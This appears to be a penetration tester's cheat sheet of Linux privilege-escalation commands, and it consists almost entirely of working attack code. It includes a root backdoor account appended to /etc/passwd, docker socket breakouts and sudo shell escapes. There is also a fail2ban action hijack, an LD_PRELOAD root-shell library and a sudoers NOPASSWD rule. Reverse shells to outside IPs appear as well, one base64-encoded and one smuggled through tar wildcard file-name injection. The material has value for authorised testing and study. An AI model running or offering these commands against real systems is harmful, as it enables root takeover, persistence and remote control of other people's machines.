> getcap -r / 2>/dev/null

# `hacker:pass123`
> echo 'hacker:$1$hacker$zVnrpoW2JQO5YUrLmAs.o1:0:0:root:/root:/bin/bash' >> /etc/passwd

> cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/root 2>/dev/null | grep -v "^#"
> ls -al /etc/cron* /etc/at*
> crontab -l

# check which image is available
> docker images 
# PE via the image
> docker -H unix:///var/run/docker.sock run -v /:/host -it {image_name} chroot /host /bin/bash

# https://gist.github.com/PwnPeter/3f0a678bf44902eae07486c9cc589c25
> curl --unix-socket /var/run/docker.sock http://localhost/images/json

# find
> sudo /usr/bin/find . -exec /bin/bash \; -quit

# perl
> perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'

# ed
https://www.hackingarticles.in/linux-for-pentester-ed-privilege-escalation/

# mail
> sudo mail --exec='!/bin/bash'

# awk
> awk "BEGIN {system(\"/bin/sh\")}"

# check for fail2ban process
> ps aux | grep fail2ban
# check write permission for actions file
> ls -ls /etc/fail2ban/action.d/iptables-multiport.conf

# modify action for malicious actions
#actionban = <iptables> -I f2b-<name> 1 -s <ip> -j <blocktype>
actionban = chmod +s /bin/bash

#actionunban = <iptables> -D f2b-<name> -s <ip> -j <blocktype>
actionunban = chmod +s /bin/bash

# Find all `SUID` binaries
> find / -perm /4000 -type f -exec ls -ld {} \; 2>/dev/null
> find / -perm -u=s -type f -exec ls -ld {} \; 2>/dev/null
> find / -perm -4000 2>/dev/null
> find / -perm -u=s -type f 2>/dev/null

# Find all files `by owner`
> find / -type f -user yash 2>/dev/null

# Find `writable directories`
> find / -type d -writable -print 2>/dev/null

# Find passwords
> grep -iR 'password' /etc/zabbix/ 2>/dev/null

# Find all modified files since time, popular folder to look for
> find /usr/ -type f -newermt '2022-01-01' -ls 2>/dev/null
> find /usr/ -type f -newermt '2022-02-01' -not -path "/usr/lib/*" -ls 2>/dev/null

> grep -rlw '<pattern>' /

> netstat -ano

> ln -fns <evil> <dst>

/proc/self/environ
/proc/self/stat
/proc/cmdline
/proc/<id>/cmdline

> cat /etc/polkit-1/localauthority.conf.d/*
> pkexec "/bin/sh"

# session 1
> echo $$ #Step1: Get current PID
> pkexec "/bin/bash" #Step 3, execute pkexec
#Step 5, if correctly authenticate, you will have a root session

# session 2
> pkttyagent --process <PID of session1> #Step 2, attach pkttyagent to session1
#Step 4, you will be asked in this session to authenticate to pkexec

> rsync --ignore-existing -t *.* user@<ip>:/backups
> echo 'bash -i >& /dev/tcp/<ip>/5555 0>&1' | base64
> echo 'echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi4yMi81NTU1IDA+JjEK|base64 -d|bash' > e.sh
> touch -- '-e sh e.sh'
> chmod +x e.sh
> chmod +x -- '-e sh e.sh'

> echo "cp /bin/bash /tmp/bash; chmod +s /tmp/bash; chmod +x /tmp/bash;" | socat - UNIX-CLIENT:/tmp/synapse_commander.s

> sudo -l

# e.g: using `service` command to achieve PE
> sudo -u {priv-user} /usr/sbin/service ../../../bin/bash

> echo "<user>  ALL=(ALL:ALL) NOPASSWD:ALL" > <user>
> cp <file> /etc/sudoers.d/
> sudo su -

> chmod u+s /bin/bash

# add `+s` from web
> `chmod+u%2bs+/bin/bash`

# e.g -rwsr-xr-x 1 root   root    35K Jan 18  2018 /usr/bin/env
# -p: Turned on whenever the real and effective user ids do not match.
> env bash -p
> bash -p

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/usr/bin/bash");
}

// compile: gcc -fPIC -shared -o shell.so shell.c -nostartfiles
// load: sudo LD_PRELOAD=shell.so

echo "mkfifo /tmp/lhennp; nc 10.4.36.159 5555 0</tmp/lhennp | /bin/sh >/tmp/lhennp 2>&1; rm /tmp/lhennp" > shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1